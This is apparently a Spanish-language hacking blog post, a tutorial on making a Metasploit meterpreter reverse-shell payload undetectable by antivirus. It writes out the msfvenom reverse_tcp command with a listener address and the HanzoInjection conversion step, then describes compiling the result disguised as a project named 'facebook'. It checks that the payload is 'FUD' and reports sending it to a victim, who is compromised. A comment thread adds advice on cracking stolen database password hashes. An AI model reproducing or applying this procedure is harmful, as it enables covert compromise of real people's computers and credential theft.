sábado, 1 de octubre de 2016

Burlando AV mediante HanzoInyection



Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:

https://github.com/P0cL4bs/hanzoInjection

root@kali:~# git clone https://github.com/P0cL4bs/hanzoInjection.git

una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin 

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin

ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:


Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@kali:~/hanzoInjection# wine HanzoInjection.exe

Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs

root@kali:~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@kali:~/hanzoInjection# leafpad meterpreter.cs


Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

 root@kali:~#monodevelop














Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.













Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs



Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml

Nos iremos a la pestaña "Referencias" > Editar

Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"

Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:


Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)

lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080. 

Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente. 


Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:





Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.

Gracias por visitar este humilde blog mis queridos lectores, espero le aya gustado este POST!, Saludos.

3 comentarios:

  1. Wow me encanta tu contenido Omar. Sigue asi, saludos :).

    Por cierto, tengo una duda con unas Passwords que obtuve de una base de datos MySql.

    ResponderEliminar
    Respuestas
    1. Si me pudieras ayudar o dar tu opinion. Estaria perfecto. Saludos :)

      Eliminar
    2. SI no puedes identificarla, puedes utilizar HASHID y romper la clave con hastcat, jhon the ripper, etc.

      (lo que vale es tu diccionario de palabras)

      Saludos.

      Te dejare este POST, no soy de dar referencias de BLOGS de otras personas, pero en esta oportunidad te haré el favor, Saludos : )

      http://www.sniferl4bs.com/2016/03/hacking-101-identificando-hashes-y.html

      Saludos.

      Eliminar

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares